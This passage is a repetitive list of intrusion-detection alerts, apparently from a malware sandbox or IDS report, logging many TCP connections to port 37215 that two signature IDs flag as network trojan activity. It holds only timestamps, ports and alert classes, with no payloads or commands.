          Timestamp:05/28/24-14:47:40.806505
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202116
          SID:2829579
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322824
          SID:2829579
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991069
          SID:2829579
          Source Port:40510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597726
          SID:2829579
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190422
          SID:2829579
          Source Port:56690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949768
          SID:2835222
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922024
          SID:2835222
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556722
          SID:2835222
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471283
          SID:2835222
          Source Port:49082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298550
          SID:2835222
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736820
          SID:2835222
          Source Port:46040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817935
          SID:2829579
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922436
          SID:2835222
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299526
          SID:2829579
          Source Port:59466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350368
          SID:2835222
          Source Port:36034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534677
          SID:2829579
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269612
          SID:2835222
          Source Port:47198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537722
          SID:2835222
          Source Port:37894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778416
          SID:2829579
          Source Port:33886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336520
          SID:2835222
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299152
          SID:2829579
          Source Port:36686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372611
          SID:2835222
          Source Port:41044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914090
          SID:2835222
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876016
          SID:2829579
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216614
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.855894
          SID:2835222
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328689
          SID:2829579
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240248
          SID:2829579
          Source Port:50200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735957
          SID:2835222
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207042
          SID:2835222
          Source Port:42964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544064
          SID:2835222
          Source Port:34264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229736
          SID:2835222
          Source Port:44688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2835222
          Source Port:56028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197306
          SID:2829579
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.554010
          SID:2835222
          Source Port:48148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042478
          SID:2829579
          Source Port:42424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272324
          SID:2835222
          Source Port:36870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543497
          SID:2835222
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299319
          SID:2835222
          Source Port:44396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548666
          SID:2835222
          Source Port:53770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659931
          SID:2829579
          Source Port:45860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379205
          SID:2835222
          Source Port:60476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126831
          SID:2835222
          Source Port:59926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537406
          SID:2835222
          Source Port:52550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212641
          SID:2829579
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525369
          SID:2835222
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562143
          SID:2835222
          Source Port:44560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124521
          SID:2829579
          Source Port:41040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222782
          SID:2829579
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033436
          SID:2835222
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814359
          SID:2835222
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325949
          SID:2829579
          Source Port:54268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2829579
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689848
          SID:2829579
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807287
          SID:2829579
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893540
          SID:2829579
          Source Port:49458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241982
          SID:2829579
          Source Port:48566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235408
          SID:2829579
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214256
          SID:2829579
          Source Port:34776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222410
          SID:2835222
          Source Port:38066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537211
          SID:2835222
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183171
          SID:2829579
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665378
          SID:2835222
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476197
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301164
          SID:2829579
          Source Port:41210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976803
          SID:2835222
          Source Port:58568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311150
          SID:2829579
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774151
          SID:2835222
          Source Port:40528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923371
          SID:2829579
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2829579
          Source Port:40684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178520
          SID:2829579
          Source Port:47936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090911
          SID:2835222
          Source Port:34650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484958
          SID:2835222
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063995
          SID:2829579
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944965
          SID:2829579
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989095
          SID:2835222
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322866
          SID:2829579
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806203
          SID:2829579
          Source Port:57286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496994
          SID:2835222
          Source Port:52454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473840
          SID:2829579
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143119
          SID:2829579
          Source Port:37224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285977
          SID:2835222
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806694
          SID:2829579
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542807
          SID:2835222
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471370
          SID:2829579
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771728
          SID:2829579
          Source Port:53914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369192
          SID:2829579
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813195
          SID:2835222
          Source Port:54796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161468
          SID:2829579
          Source Port:39730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778416
          SID:2835222
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497817
          SID:2835222
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855996
          SID:2829579
          Source Port:56782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975860
          SID:2835222
          Source Port:46172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357113
          SID:2835222
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867572
          SID:2829579
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704072
          SID:2835222
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2835222
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115866
          SID:2829579
          Source Port:55606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622187
          SID:2829579
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477983
          SID:2835222
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961522
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669491
          SID:2835222
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671954
          SID:2835222
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734421
          SID:2835222
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287729
          SID:2835222
          Source Port:50580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526571
          SID:2835222
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725115
          SID:2835222
          Source Port:36410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154139
          SID:2835222
          Source Port:35626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2829579
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021554
          SID:2829579
          Source Port:54654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482857
          SID:2829579
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746024
          SID:2835222
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.612908
          SID:2829579
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062863
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296073
          SID:2829579
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298979
          SID:2829579
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931152
          SID:2829579
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211818
          SID:2829579
          Source Port:50888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411924
          SID:2835222
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797780
          SID:2835222
          Source Port:60144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301352
          SID:2835222
          Source Port:57722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977048
          SID:2829579
          Source Port:35448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678146
          SID:2835222
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145651
          SID:2829579
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369574
          SID:2835222
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187355
          SID:2835222
          Source Port:53428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666663
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935283
          SID:2835222
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093519
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322817
          SID:2829579
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219627
          SID:2829579
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272890
          SID:2829579
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276519
          SID:2829579
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379161
          SID:2829579
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.236932
          SID:2835222
          Source Port:59286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298194
          SID:2829579
          Source Port:53768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839813
          SID:2835222
          Source Port:48526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271918
          SID:2829579
          Source Port:39060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847571
          SID:2829579
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178365
          SID:2835222
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591462
          SID:2835222
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470984
          SID:2829579
          Source Port:52298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191955
          SID:2835222
          Source Port:34516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588697
          SID:2835222
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.753156
          SID:2829579
          Source Port:33802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780918
          SID:2835222
          Source Port:54986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463512
          SID:2835222
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079520
          SID:2829579
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983701
          SID:2835222
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987312
          SID:2835222
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664431
          SID:2835222
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604334
          SID:2829579
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631749
          SID:2835222
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.310320
          SID:2829579
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652811
          SID:2835222
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839371
          SID:2835222
          Source Port:60968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732201
          SID:2835222
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266894
          SID:2829579
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191799
          SID:2835222
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926588
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652955
          SID:2829579
          Source Port:43550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269249
          SID:2829579
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848309
          SID:2835222
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284598
          SID:2829579
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605052
          SID:2829579
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671897
          SID:2835222
          Source Port:54066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045959
          SID:2835222
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238166
          SID:2835222
          Source Port:59360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893584
          SID:2835222
          Source Port:42488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727972
          SID:2829579
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269898
          SID:2829579
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894094
          SID:2829579
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680616
          SID:2829579
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241939
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709267
          SID:2835222
          Source Port:49550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813236
          SID:2835222
          Source Port:57364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907966
          SID:2835222
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352484
          SID:2829579
          Source Port:34018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821854
          SID:2835222
          Source Port:42860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476778
          SID:2829579
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175945
          SID:2829579
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778906
          SID:2829579
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767051
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605997
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529997
          SID:2835222
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764334
          SID:2829579
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847680
          SID:2835222
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669276
          SID:2835222
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.693323
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663225
          SID:2835222
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606089
          SID:2829579
          Source Port:35902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497871
          SID:2829579
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102762
          SID:2829579
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480435
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486831
          SID:2835222
          Source Port:46780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144113
          SID:2835222
          Source Port:59046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186229
